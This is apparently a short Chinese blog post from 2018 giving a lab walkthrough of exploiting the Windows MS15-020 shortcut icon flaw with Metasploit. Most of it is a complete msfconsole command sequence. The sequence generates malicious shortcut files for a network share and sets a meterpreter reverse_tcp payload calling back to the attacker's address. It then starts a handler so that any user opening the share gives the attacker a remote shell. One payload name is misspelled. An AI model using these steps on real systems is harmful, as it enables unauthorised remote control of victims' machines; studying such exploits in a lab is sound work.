正文
Metasploit MS15-020漏洞利用
小程序:扫一扫查出行【扫一扫了解最新限行尾号】
复制小程序
| title | date | tags | layout |
|---|---|---|---|
Metasploit MS15-020漏洞利用 | 2018-05-06 | Metasploit | post |
环境: 共享机/受害者:windows xp IP:192.168.222.1 攻击机:kali linux IP:192.168.10.1
msfconsole //在kali终端输入msfconsole进入控制台search ms15-020 //搜索ms15-020漏洞use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader //使用该模块show options //显示所有参数set payload windows/meterpreter/reverse_tcp //设置payload
设置参数:
set unchost 192.168.222.1 //共享的主机地址
set uncshare //共享的文件夹名
set lhost 192.168.10.1 //攻击机IP地址
exploit
运行后会生成三个文件,将三个文件放到共享机的share目录下。
继续在msf中使用handler进行监听:
use exploit/multi/handler
set payload windows/meterpreter/reverser_tcp
set lhost 192.168.10.1
exploit
以上设置完成之后在当别的用户再访问这个共享文件夹时就可以直接获得meterpreter
